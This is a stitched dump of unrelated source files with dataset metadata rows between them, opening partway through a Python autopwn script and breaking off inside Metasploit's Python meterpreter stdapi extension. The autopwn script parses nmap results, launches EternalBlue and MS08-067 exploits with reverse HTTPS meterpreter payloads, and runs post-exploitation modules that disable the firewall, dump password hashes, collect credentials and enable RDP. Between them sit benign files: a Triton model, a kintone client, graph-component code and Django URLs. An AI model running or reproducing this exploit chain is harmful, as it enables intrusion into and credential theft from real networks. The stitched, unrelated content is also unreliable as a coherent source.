for host in hosts:
ip = host.address
# Get SMB signing data
for script_out in host.scripts_results:
for script in nse_scripts:
if script_out['id'] == script:
if 'State: VULNERABLE' in script_out['output']:
print_good('NSE script {} found vulnerable host: {}'.format(script, ip))
if vuln_hosts.get(ip):
vuln_hosts[ip].append(script)
else:
vuln_hosts[ip] = [script]
return vuln_hosts
def get_local_ip(iface):
'''
Gets the the local IP of an interface
'''
ip = netifaces.ifaddresses(iface)[netifaces.AF_INET][0]['addr']
return ip
def get_iface():
'''
Gets the right interface
'''
try:
iface = netifaces.gateways()['default'][netifaces.AF_INET][1]
except:
ifaces = []
for iface in netifaces.interfaces():
# list of ipv4 addrinfo dicts
ipv4s = netifaces.ifaddresses(iface).get(netifaces.AF_INET, [])
for entry in ipv4s:
addr = entry.get('addr')
if not addr:
continue
if not (iface.startswith('lo') or addr.startswith('127.')):
ifaces.append(iface)
iface = ifaces[0]
return iface
def create_rc_file(vuln_hosts):
local_ip = get_local_ip(get_iface())
port = '443'
# Create AutoRunScripts
with open('autorun.rc', 'w') as ar:
ar.write('run post/windows/manage/migrate\n'
'run post/windows/manage/killfw\n'
'run post/windows/gather/hashdump\n'
'run post/windows/manage/wdigest_caching\n'
'run post/windows/gather/credentials/credential_collector\n'
'run post/windows/manage/enable_rdp\n')
# Start listener
#start_handler_lines = ('use exploit/multi/handler\n'
# 'set PAYLOAD windows/meterpreter/reverse_https\n'
# 'set LHOST {}\n'
# 'set LPORT {}\n'
# 'set ExitOnSession false\n'
# 'exploit -j -z\n'
# 'set AutoRunScript multi_console_command -rc autorun.rc\n'.format(local_ip, port))
start_autorunscript = ('set AutoRunScript multi_console_command -rc autorun.rc\n'.format(local_ip, port))
# Exploit ms17-010
ms17010_lines = ('use exploit/windows/smb/ms17_010_eternalblue\n'
'set RHOST {}\n'
'set MaxExploitAttempts 5\n'
'set payload windows/meterpreter/reverse_https\n'
'set LHOST {}\n'
'set LPORT {}\n'
'exploit -j -z\n')
# Exploit ms08-067
ms08067_lines = ('use exploit/windows/smb/ms08_067_netapi\n'
'set RHOST {}\n'
'set payload windows/meterpreter/reverse_https\n'
'set LHOST {}\n'
'set LPORT {}\n'
'exploit -j -z\n')
with open('autopwn.rc', 'w') as f:
f.write(start_autorunscript)
for ip in vuln_hosts:
for nse in vuln_hosts[ip]:
if 'ms17-010' in nse:
f.write(ms17010_lines.format(ip, local_ip, port))
elif 'ms08-067' in nse:
f.write(ms08067_lines.format(ip, local_ip, port))
def main(report, args):
report = parse_nmap(args)
hosts = get_hosts(args, report)
vuln_hosts = get_vuln_hosts(hosts)
create_rc_file(vuln_hosts)
proc = run_proc_xterm('msfconsole -r autopwn.rc')
if __name__ == "__main__":
args = parse_args()
if os.geteuid():
print_bad('Run as root')
sys.exit()
report = parse_nmap(args)
main(report, args)
| 31.74 | 111 | 0.563957 | 986 | 7,935 | 4.409736 | 0.292089 | 0.012879 | 0.019319 | 0.017249 | 0.174333 | 0.099356 | 0.088316 | 0.088316 | 0.075437 | 0.075437 | 0 | 0.022558 | 0.324008 | 7,935 | 249 | 112 | 31.86747 | 0.788031 | 0.165217 | 0 | 0.1625 | 0 | 0.0125 | 0.188972 | 0.064281 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.0625 | 0 | 0.21875 | 0.11875 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b4ef999d97ae9394309f0ac09086a7585a37931 | 1,191 | py | Python | serve/tests/unittests/triton/expected_files/py_to_triton_test/1/model.py | shiyu22/towhee | 3e7b24aefb20f3e6452da115bf7e47e6261d65eb | [
"Apache-2.0"
] | null | null | null | serve/tests/unittests/triton/expected_files/py_to_triton_test/1/model.py | shiyu22/towhee | 3e7b24aefb20f3e6452da115bf7e47e6261d65eb | [
"Apache-2.0"
] | null | null | null | serve/tests/unittests/triton/expected_files/py_to_triton_test/1/model.py | shiyu22/towhee | 3e7b24aefb20f3e6452da115bf7e47e6261d65eb | [
"Apache-2.0"
] | null | null | null | import towhee
import numpy
from towhee import ops
import triton_python_backend_utils as pb_utils
class TritonPythonModel:
def initialize(self, args):
# create op instance
task = getattr(ops, 'local')
init_args = {}
self.op = getattr(task, 'triton_py')(**init_args)
def execute(self, requests):
responses = []
for request in requests:
# get input tensors from request
in0 = pb_utils.get_input_tensor_by_name(request, 'INPUT0')
# create input args from tensors
arg0 = in0.as_numpy()[0].decode('utf-8')
# call callable object
result0 = self.op(arg0)
# convert results to tensors
out0 = pb_utils.Tensor('OUTPUT0', numpy.array(result0, numpy.int8))
out1 = pb_utils.Tensor('OUTPUT1', numpy.array([result0.mode], numpy.object_))
# organize response
response = pb_utils.InferenceResponse(output_tensors=[out0, out1])
responses.append(response)
return responses
def finalize(self):
pass
| 28.357143 | 89 | 0.570109 | 127 | 1,191 | 5.204724 | 0.519685 | 0.05295 | 0.039334 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021739 | 0.343409 | 1,191 | 41 | 90 | 29.04878 | 0.823529 | 0.122586 | 0 | 0 | 0 | 0 | 0.037572 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.136364 | false | 0.045455 | 0.181818 | 0 | 0.409091 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b52d87b14c5b5a8fe3ff82e0f7d032c502a6439 | 381 | py | Python | audmath/__init__.py | audeering/audmath | 3f6fee1ce0bf00c50f16fe41c15fc2fda8635128 | [
"MIT"
] | null | null | null | audmath/__init__.py | audeering/audmath | 3f6fee1ce0bf00c50f16fe41c15fc2fda8635128 | [
"MIT"
] | 2 | 2021-07-29T08:35:32.000Z | 2021-07-30T08:47:59.000Z | audmath/__init__.py | audeering/audmath | 3f6fee1ce0bf00c50f16fe41c15fc2fda8635128 | [
"MIT"
] | null | null | null | from audmath.core.api import (
inverse_normal_distribution,
)
# Discourage from audmath import *
__all__ = []
# Dynamically get the version of the installed module
try:
import pkg_resources
__version__ = pkg_resources.get_distribution(__name__).version
except Exception: # pragma: no cover
pkg_resources = None # pragma: no cover
finally:
del pkg_resources
| 23.8125 | 66 | 0.753281 | 47 | 381 | 5.702128 | 0.617021 | 0.179104 | 0.097015 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.183727 | 381 | 15 | 67 | 25.4 | 0.861736 | 0.309711 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.181818 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b549d79d485f539309c0b7481a958861fd6ba74 | 767 | py | Python | kintone_rest_client/file.py | yamaryu0508/kintone-rest-client | f5f4c2337bcdb58db097d1e00996f12d69b85209 | [
"MIT"
] | null | null | null | kintone_rest_client/file.py | yamaryu0508/kintone-rest-client | f5f4c2337bcdb58db097d1e00996f12d69b85209 | [
"MIT"
] | null | null | null | kintone_rest_client/file.py | yamaryu0508/kintone-rest-client | f5f4c2337bcdb58db097d1e00996f12d69b85209 | [
"MIT"
] | null | null | null | import os
from simple_http_client import FormData
class File(object):
def __init__(self, client):
self.client = client
def upload_file(self, params):
file = params['file']
form = FormData()
name = None
if 'name' in file and 'data' in file:
name = file['name']
data = file['data']
elif 'path' in file:
path = file['path']
name = os.path.basename(path)
with open(path, 'rb') as f:
data = f.read()
form.add_file(
'file',
name,
data
)
return self.client.request(
path='/k/v1/file',
method='POST',
params=form
)
def download_file(self, params):
return self.client.request(
path='/k/v1/file',
method='GET',
params=params
) | 20.184211 | 41 | 0.568449 | 100 | 767 | 4.27 | 0.4 | 0.093677 | 0.065574 | 0.107728 | 0.187354 | 0.187354 | 0.187354 | 0.187354 | 0.187354 | 0 | 0 | 0.003711 | 0.297262 | 767 | 38 | 42 | 20.184211 | 0.788497 | 0 | 0 | 0.121212 | 0 | 0 | 0.079427 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.060606 | 0.030303 | 0.242424 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b55dcc63c4dda3f384e2b7b42f869523ce01193 | 19,131 | py | Python | straph/components/strongly_connected_component.py | busyweaver/Straph | b97a7b99ffab2416eb81df11073cc927f648fa10 | [
"Apache-2.0"
] | 3 | 2021-05-24T16:23:51.000Z | 2021-08-07T20:14:53.000Z | straph/components/strongly_connected_component.py | busyweaver/Straph | b97a7b99ffab2416eb81df11073cc927f648fa10 | [
"Apache-2.0"
] | 1 | 2021-05-25T12:30:36.000Z | 2021-05-25T12:30:36.000Z | straph/components/strongly_connected_component.py | busyweaver/Straph | b97a7b99ffab2416eb81df11073cc927f648fa10 | [
"Apache-2.0"
] | 3 | 2021-05-25T09:04:43.000Z | 2021-11-02T16:27:23.000Z | # Copyright (C) 2017-2021 Léo Rannou - Sorbonne Université/LIP6 - Thales
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
from straph import dags as cdag
from straph.components import ConnectedComponent
def compute_strongly_connected_components(S, format="object_with_links", condensation_dag=False, isolated_nodes=True,
streaming_output=None, free_memory=False):
"""
Compute Strongly Connected Components (SCC) of a ``StreamGraph``.
:param free_memory:
:param streaming_output:
:param isolated_nodes:
:param S: A Stream Graph
:param format: Format of the output can be "cluster" or "scc_object"
:param condensation_dag: Boolean, true if we want to output the Condensation DAG, false otherwise
:return:
"""
node_2_status = {} # Dictionary associating a node to his current status : (current degree, number current comp)
tmp_components = [] # List of current strongly connected components (object)
final_components = [] # Clusters : [(t0,t1,u)]...
cnt_scc_id = 0
# Condensation DAG
if condensation_dag:
condensation_dag = cdag.CondensationDag()
else:
condensation_dag = None
#
id_wcc = S.id
E = S.ordered_batch_links(free_memory=free_memory)
if streaming_output:
opt = open(streaming_output, 'w')
else:
opt = None
for batch in E:
# print("\n Batch :",batch)
c = batch[0][0]
if c == 1: # ARRIVAL
cnt_scc_id = process_batch_link_arrival(batch, node_2_status, tmp_components,
final_components,
cnt_scc_id,
condensation_dag=condensation_dag,
format=format,
streaming_output=opt)
else: # DEPARTURE
cnt_scc_id = process_batch_link_departure(batch, node_2_status, tmp_components,
final_components,
cnt_scc_id,
condensation_dag=condensation_dag,
format=format,
streaming_output=opt)
# Add isolated Nodes
if isolated_nodes:
for c in S.isolated_nodes():
if format == "cluster":
final_components.append([c])
if condensation_dag:
condensation_dag.add_node([c])
elif format == "object" or format == "object_with_links":
c = StronglyConnectedComponent(id=cnt_scc_id,
times=[c[0], c[1]],
nodes={c[2]})
final_components.append(c)
if condensation_dag:
condensation_dag.add_node(c)
elif format == "streaming":
c = (c[0], c[1], 1)
if streaming_output:
opt.write(str(c[0]) + ";" + str(c[1]) + ";" + str(1))
opt.write("\n")
else:
final_components.append(c)
cnt_scc_id += 1
if condensation_dag:
condensation_dag.set_id(id_wcc)
return final_components, condensation_dag
else:
return final_components
def merge_scc(l, node_2_status, tmp_components,
final_components,
condensation_dag=None,
cnt_scc_id=None,
format="cluster", streaming_output=None):
t0, t1, u, v = l
id_comp_u = node_2_status[u][1]
id_comp_v = node_2_status[v][1]
if len(tmp_components[id_comp_v].nodes) > len(tmp_components[id_comp_u].nodes):
# If a component is bigger than another we merge into the bigger one.
id_comp_u, id_comp_v = id_comp_v, id_comp_u
comp_1 = tmp_components[id_comp_u]
comp_2 = tmp_components[id_comp_v]
if comp_1.times[0] != t0:
cnt_scc_id = close_component(comp_1, t0, final_components, cnt_scc_id, condensation_dag=condensation_dag,
format=format, streaming_output=streaming_output)
# predecessor_in_dag[n_comp_1] += [cnt_scc_id - 1] # previous closed component
comp_1.set_begin_time(t0)
if comp_2.times[0] != t0:
cnt_scc_id = close_component(comp_2, t0, final_components, cnt_scc_id, condensation_dag=condensation_dag,
format=format, streaming_output=streaming_output)
# predecessor_in_dag[n_comp_1] += [cnt_scc_id - 1] # previous closed component (n_comp_1 because we merge)
for n in comp_2.nodes:
node_2_status[n][1] = id_comp_u # Actualize referencement before deletion of 2nd comp
comp_1.merge(comp_2)
comp_1.add_link(l) # Add the current link
node_2_status[u][0] += 1
node_2_status[v][0] += 1
tmp_components[id_comp_v] = None
return cnt_scc_id
def update_scc(node_to_update, node_to_add, l, node_2_status, tmp_components,
final_components,
condensation_dag=None,
cnt_scc_id=None,
format="cluster", streaming_output=None
):
"""
:param streaming_output:
:param format:
:param final_components:
:param node_to_update:
:param node_to_add:
:param l:
:param node_2_status:
:param tmp_components:
:param condensation_dag:
:param cnt_scc_id:
:return:
"""
t0, t1 = l[0], l[1]
id_current_comp = node_2_status[node_to_update][1]
current_comp = tmp_components[id_current_comp]
if current_comp.times[0] != t0:
cnt_scc_id = close_component(current_comp, t0, final_components, cnt_scc_id,
condensation_dag=condensation_dag,
format=format, streaming_output=streaming_output)
# predecessor_in_dag[n_current_comp] += [cnt_scc_id - 1] # previous closed component
current_comp.set_begin_time(t0) # Input a new begining time
current_comp.add_node(node_to_add) # Add the node to the comp
current_comp.add_link(l) # Actualize the component with the new link
node_2_status[node_to_add] = [1, id_current_comp]
node_2_status[node_to_update][0] += 1
return cnt_scc_id
def create_scc(l, node_2_status, tmp_components, format="cluster"):
"""
Create a Strongly Connected Component from the link *l*
:param format:
:param l:
:param node_2_status:
:param tmp_components:
:return:
"""
t0, t1, u, v = l
new_id_comp = len(tmp_components)
node_2_status[u] = [1, new_id_comp]
node_2_status[v] = [1, new_id_comp]
if format == "object_with_links":
lks = [[t0, t1, u, v]]
else:
lks = None
tmp_components.append(StronglyConnectedComponent(times=[t0, t0],
nodes={u, v},
active_links={(u, v)},
links=lks))
def process_batch_link_arrival(batch, node_2_status, tmp_components, final_components,
cnt_scc_id, condensation_dag=None, format="cluster", streaming_output=None):
for b in batch:
t0, t1, u, v = b[1:]
l = (t0, t1, u, v)
if u not in node_2_status and v not in node_2_status:
create_scc(l, node_2_status, tmp_components, format=format)
elif u in node_2_status and v not in node_2_status:
cnt_scc_id = update_scc(u, v, l, node_2_status, tmp_components,
final_components,
condensation_dag=condensation_dag,
cnt_scc_id=cnt_scc_id,
format=format, streaming_output=streaming_output
)
elif u not in node_2_status and v in node_2_status:
cnt_scc_id = update_scc(v, u, l, node_2_status, tmp_components,
final_components,
condensation_dag=condensation_dag,
cnt_scc_id=cnt_scc_id,
format=format, streaming_output=streaming_output
)
elif node_2_status[u][1] != node_2_status[v][1]:
cnt_scc_id = merge_scc(l, node_2_status, tmp_components,
final_components,
condensation_dag=condensation_dag,
cnt_scc_id=cnt_scc_id,
format=format, streaming_output=streaming_output
)
else:
node_2_status[u][0] += 1
node_2_status[v][0] += 1
current_comp = tmp_components[node_2_status[u][1]]
current_comp.add_link(l)
return cnt_scc_id
def process_batch_link_departure(batch, node_2_status, tmp_components,
final_components, cnt_scc_id, condensation_dag=None,
format="cluster",
streaming_output=None):
"""
:param streaming_output:
:param batch:
:param node_2_status:
:param tmp_components:
:param final_components:
:param condensation_dag:
:param format:
:param cnt_scc_id:
:return:
"""
id_comp_to_split = set()
id_comp_to_close = set()
nodes_to_remove = set()
t1 = batch[0][1]
for l in batch:
u, v = l[2], l[3]
node_2_status[u][0] -= 1
node_2_status[v][0] -= 1
id_comp = node_2_status[u][1]
comp = tmp_components[id_comp]
comp.remove_link((u, v))
# By default we split the component
if node_2_status[u][0] == 0 or node_2_status[v][0] == 0:
# If it's a node's departure, there is several cases:
# 1. No more links in the components (it's empty)
if not comp.active_links:
cnt_scc_id = close_component(comp, t1, final_components, cnt_scc_id, condensation_dag=condensation_dag,
format=format, streaming_output=streaming_output)
tmp_components[id_comp] = None
id_comp_to_split.discard(id_comp)
id_comp_to_close.discard(id_comp)
del node_2_status[u]
del node_2_status[v]
# 2. A node left but there is still some nodes inside (and other departure to come)
else:
if node_2_status[u][0] == 0:
id_comp_to_close.add(id_comp)
nodes_to_remove.add(u)
del node_2_status[u]
if node_2_status[v][0] == 0:
id_comp_to_close.add(id_comp)
nodes_to_remove.add(v)
del node_2_status[v]
else:
id_comp_to_split.add(id_comp)
for id_comp in id_comp_to_split:
comp = tmp_components[id_comp]
if comp.active_links:
R = comp.split()
if R:
# We close the current component :)
cnt_scc_id = close_component(comp, t1, final_components, cnt_scc_id, condensation_dag=condensation_dag,
format=format, streaming_output=streaming_output)
tmp_components[id_comp] = None
id_comp_to_close.discard(id_comp)
for C in R:
# New components
# assert is_connected(C)
C.set_begin_time(t1) # set new begin time
new_id_comp = len(tmp_components)
for n in C.nodes:
node_2_status[n][1] = new_id_comp
# predecessor_in_dag_tmp[len(tmp_components)] += [cnt_scc_id - 1] # previous closed component
tmp_components.append(C) # to the antecedent of news comp
# Id comp to close is necessary.
for id_comp in id_comp_to_close:
comp = tmp_components[id_comp]
cnt_scc_id = close_component(comp, t1, final_components, cnt_scc_id, condensation_dag=condensation_dag,
format=format, streaming_output=streaming_output)
comp.nodes -= nodes_to_remove
if comp.nodes:
comp.set_begin_time(t1) # A node left but other are still presents.
else:
raise ValueError("Starfoullah")
return cnt_scc_id
def close_component(comp,
t,
final_components,
cnt_scc_id,
condensation_dag=None,
format="cluster",
streaming_output=None):
"""
Close current component
:param streaming_output:
:param comp:
:param t:
:param final_components:
:param cnt_scc_id:
:param condensation_dag:
:param format:
:return:
"""
c = None
if format == "object" or format == "object_with_links":
copy_comp = copy.copy(comp)
copy_comp.set_end_time(t) # Put an end time to the previous component
copy_comp.id = cnt_scc_id
final_components.append(copy_comp)
c = copy_comp
elif format == "cluster":
c = [(comp.times[0], t, n) for n in comp.nodes]
final_components.append(c)
elif format == "streaming":
n_nodes = len(comp.nodes)
if streaming_output:
streaming_output.write(str(comp.times[0]) + ";" + str(t) + ";" + str(n_nodes))
streaming_output.write("\n")
else:
c = (comp.times[0], t, n_nodes)
final_components.append(c)
if condensation_dag:
condensation_dag.add_node(c)
cnt_scc_id += 1
return cnt_scc_id
class StronglyConnectedComponent(ConnectedComponent):
def __init__(self,
id=None,
times=None,
nodes=None,
active_links=None,
links=None
):
"""
A basic constructor for a connected component object
:param id: an identifier (nojoke)
:param times: [beginning time, ending time]
:param nodes: A set of nodes present in the component
:param active_links: A set of links present in the component (Only useful during components computation)
:param links: a list of 'segmented' links
"""
super().__init__(id, times, nodes, active_links, links)
def __repr__(self):
rep = "Id SCC :" + str(self.id) + " time window :" + str(self.times) + "\n"
rep += "Nodes :" + str(self.nodes) + "\n"
rep += "Links :" + str(self.links) + "\n"
return rep
def __copy__(self):
comp_copy = StronglyConnectedComponent()
comp_copy.times = copy.copy(self.times)
if self.links:
comp_copy.links = [copy.copy(l) for l in self.links]
else:
comp_copy.links = None
comp_copy.nodes = copy.copy(self.nodes)
return comp_copy
def split(self):
R = super().split() # (current_nodes,current_links,active_links)
return [StronglyConnectedComponent(nodes=c[0],
links=c[1],
active_links=c[2]) for c in R]
def get_stable_components(self, format="object"):
"""
Compute the stable connected components included in the current ``StronglyConnectedComponent``
:param format:
:return: A list of ``StableConnectedComponents`` objects
"""
stable_components = []
if self.links and len(self.get_interactions_times()) > 1:
interact_times = self.get_interactions_times()
time_to_pos = {t: i for t, i in zip(interact_times, range(len(interact_times)))}
inter_nodes = [set() for _ in range(len(interact_times) - 1)]
inter_links = [[] for _ in range(len(interact_times) - 1)]
for l in self.links:
t0, t1, u, v = l
t0 = max(t0, self.times[0])
t1 = min(t1, self.times[1])
for i in range(time_to_pos[t0], time_to_pos[t1]):
inter_nodes[i].add(u)
inter_nodes[i].add(v)
inter_links[i].append((t0, t1, u, v))
if format == "object" or format == "object_with_links":
for j in range(len(interact_times) - 1):
c = StronglyConnectedComponent(id=(self.id, j),
times=(interact_times[j], interact_times[j + 1]),
nodes=set(
[u for u in inter_nodes[time_to_pos[interact_times[j]]]]),
links=[l for l in inter_links[time_to_pos[interact_times[j]]]]
)
stable_components.append(c)
if format == "cluster":
for j in range(len(interact_times) - 1):
c = [(interact_times[j], interact_times[j + 1], u) for u in
inter_nodes[time_to_pos[interact_times[j]]]]
stable_components.append(c)
else:
if format == "object" or format == "object_with_links":
if self.links:
stable_components = [StronglyConnectedComponent(id=self.id,
times=self.times,
nodes=self.nodes,
links=self.links)]
else:
stable_components = [StronglyConnectedComponent(id=self.id,
times=self.times,
nodes=self.nodes)]
if format == "cluster":
stable_components = [[(self.times[0], self.times[1], u) for u in self.nodes]]
return stable_components
| 41.498915 | 119 | 0.545188 | 2,272 | 19,131 | 4.310299 | 0.109155 | 0.024507 | 0.053916 | 0.049015 | 0.493618 | 0.406311 | 0.391913 | 0.354233 | 0.332789 | 0.298785 | 0 | 0.016453 | 0.370969 | 19,131 | 460 | 120 | 41.58913 | 0.797324 | 0.181172 | 0 | 0.394904 | 0 | 0 | 0.018449 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038217 | false | 0 | 0.009554 | 0 | 0.085987 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b565d06a318c1ffd0a345b62d8fede899d0d6ae | 593 | py | Python | clubs/urls.py | DarkoR12/dafi-system | f923ea4273b04f7acc7016b2f7d03e51eb00b85b | [
"MIT"
] | null | null | null | clubs/urls.py | DarkoR12/dafi-system | f923ea4273b04f7acc7016b2f7d03e51eb00b85b | [
"MIT"
] | null | null | null | clubs/urls.py | DarkoR12/dafi-system | f923ea4273b04f7acc7016b2f7d03e51eb00b85b | [
"MIT"
] | null | null | null | from django.urls import path
from . import views
app_name = 'clubs'
urlpatterns = [
path('', views.IndexView.as_view(), name='list'),
path('<str:slug>/quedadas/agregar/', views.MeetingAddView.as_view(), name='meeting_add'),
path('<str:slug>/quedadas/<int:pk>/editar/', views.MeetingEditView.as_view(), name='meeting_edit'),
path('<str:slug>/quedadas/<int:pk>/eliminar/', views.MeetingDeleteView.as_view(), name='meeting_delete'),
path('<str:slug>/editar/', views.ClubEditView.as_view(), name='edit'),
path('<str:slug>/', views.DetailView.as_view(), name='detail')
]
| 39.533333 | 109 | 0.686341 | 78 | 593 | 5.089744 | 0.410256 | 0.09068 | 0.151134 | 0.143577 | 0.120907 | 0.120907 | 0 | 0 | 0 | 0 | 0 | 0 | 0.10118 | 593 | 14 | 110 | 42.357143 | 0.744841 | 0 | 0 | 0 | 0 | 0 | 0.315346 | 0.172007 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.181818 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b5ae56a59d6f555b497604a51656a981c483354 | 60,639 | py | Python | data/meterpreter/ext_server_stdapi.py | madhavarao-yejarla/VoIP | 3f7d0cdc0bb1423f9e952e411d073a1424ef9f5e | [
"Apache-2.0",
"BSD-3-Clause"
] | 35 | 2015-08-08T07:23:38.000Z | 2021-04-07T18:00:44.000Z | data/meterpreter/ext_server_stdapi.py | madhavarao-yejarla/VoIP | 3f7d0cdc0bb1423f9e952e411d073a1424ef9f5e | [
"Apache-2.0",
"BSD-3-Clause"
] | 1 | 2019-02-12T12:13:53.000Z | 2019-02-12T12:13:53.000Z | data/meterpreter/ext_server_stdapi.py | fozavci/metasploit-framework-with-viproy | 3f7d0cdc0bb1423f9e952e411d073a1424ef9f5e | [
"Apache-2.0",
"BSD-3-Clause"
] | 23 | 2015-08-11T05:07:47.000Z | 2020-11-06T03:55:10.000Z | import fnmatch
import getpass
import os
import platform
import shlex
import shutil
import socket
import struct
import subprocess
import sys
import time
try:
import ctypes
has_ctypes = True
has_windll = hasattr(ctypes, 'windll')
except ImportError:
has_ctypes = False
has_windll = False
try:
import pty
has_pty = True
except ImportError:
has_pty = False
try:
import pwd
has_pwd = True
except ImportError:
has_pwd = False
try:
import SystemConfiguration as osxsc
has_osxsc = True
except ImportError:
has_osxsc = False
try:
import termios
has_termios = True
except ImportError:
has_termios = False
try:
import _winreg as winreg
has_winreg = True
except ImportError:
has_winreg = False
try:
import winreg
has_winreg = True
except ImportError:
has_winreg = (has_winreg or False)
if sys.version_info[0] < 3:
is_str = lambda obj: issubclass(obj.__class__, str)
is_bytes = lambda obj: issubclass(obj.__class__, str)
bytes = lambda *args: str(*args[:1])
NULL_BYTE = '\x00'
unicode = lambda x: (x.decode('UTF-8') if isinstance(x, str) else x)
else:
if isinstance(__builtins__, dict):
is_str = lambda obj: issubclass(obj.__class__, __builtins__['str'])
str = lambda x: __builtins__['str'](x, 'UTF-8')
else:
is_str = lambda obj: issubclass(obj.__class__, __builtins__.str)
str = lambda x: __builtins__.str(x, 'UTF-8')
is_bytes = lambda obj: issubclass(obj.__class__, bytes)
NULL_BYTE = bytes('\x00', 'UTF-8')
long = int
unicode = lambda x: (x.decode('UTF-8') if isinstance(x, bytes) else x)
if has_ctypes:
#
# Windows Structures
#
class SOCKADDR(ctypes.Structure):
_fields_ = [("sa_family", ctypes.c_ushort),
("sa_data", (ctypes.c_uint8 * 14))]
class SOCKET_ADDRESS(ctypes.Structure):
_fields_ = [("lpSockaddr", ctypes.POINTER(SOCKADDR)),
("iSockaddrLength", ctypes.c_int)]
class IP_ADAPTER_UNICAST_ADDRESS(ctypes.Structure):
_fields_ = [
("s", type(
'_s_IP_ADAPTER_UNICAST_ADDRESS',
(ctypes.Structure,),
dict(_fields_ = [
("Length", ctypes.c_ulong),
("Flags", ctypes.c_uint32)
])
)),
("Next", ctypes.c_void_p),
("Address", SOCKET_ADDRESS),
("PrefixOrigin", ctypes.c_uint32),
("SuffixOrigin", ctypes.c_uint32),
("DadState", ctypes.c_uint32),
("ValidLifetime", ctypes.c_ulong),
("PreferredLifetime", ctypes.c_ulong),
("LeaseLifetime", ctypes.c_ulong),
("OnLinkPrefixLength", ctypes.c_uint8)]
class IP_ADAPTER_ADDRESSES(ctypes.Structure):
_fields_ = [
("u", type(
'_u_IP_ADAPTER_ADDRESSES',
(ctypes.Union,),
dict(_fields_ = [
("Alignment", ctypes.c_ulonglong),
("s", type(
'_s_IP_ADAPTER_ADDRESSES',
(ctypes.Structure,),
dict(_fields_ = [
("Length", ctypes.c_ulong),
("IfIndex", ctypes.c_uint32)
])
))
])
)),
("Next", ctypes.c_void_p),
("AdapterName", ctypes.c_char_p),
("FirstUnicastAddress", ctypes.c_void_p),
("FirstAnycastAddress", ctypes.c_void_p),
("FirstMulticastAddress", ctypes.c_void_p),
("FirstDnsServerAddress", ctypes.c_void_p),
("DnsSuffix", ctypes.c_wchar_p),
("Description", ctypes.c_wchar_p),
("FriendlyName", ctypes.c_wchar_p),
("PhysicalAddress", (ctypes.c_uint8 * 8)),
("PhysicalAddressLength", ctypes.c_uint32),
("Flags", ctypes.c_uint32),
("Mtu", ctypes.c_uint32),
("IfType", ctypes.c_uint32),
("OperStatus", ctypes.c_uint32),
("Ipv6IfIndex", ctypes.c_uint32),
("ZoneIndices", (ctypes.c_uint32 * 16)),
("FirstPrefix", ctypes.c_void_p),
("TransmitLinkSpeed", ctypes.c_uint64),
("ReceiveLinkSpeed", ctypes.c_uint64),
("FirstWinsServerAddress", ctypes.c_void_p),
("FirstGatewayAddress", ctypes.c_void_p),
("Ipv4Metric", ctypes.c_ulong),
("Ipv6Metric", ctypes.c_ulong),
("Luid", ctypes.c_uint64),
("Dhcpv4Server", SOCKET_ADDRESS),
("CompartmentId", ctypes.c_uint32),
("NetworkGuid", (ctypes.c_uint8 * 16)),
("ConnectionType", ctypes.c_uint32),
("TunnelType", ctypes.c_uint32),
("Dhcpv6Server", SOCKET_ADDRESS),
("Dhcpv6ClientDuid", (ctypes.c_uint8 * 130)),
("Dhcpv6ClientDuidLength", ctypes.c_ulong),
("Dhcpv6Iaid", ctypes.c_ulong),
("FirstDnsSuffix", ctypes.c_void_p)]
class MIB_IFROW(ctypes.Structure):
_fields_ = [("wszName", (ctypes.c_wchar * 256)),
("dwIndex", ctypes.c_uint32),
("dwType", ctypes.c_uint32),
("dwMtu", ctypes.c_uint32),
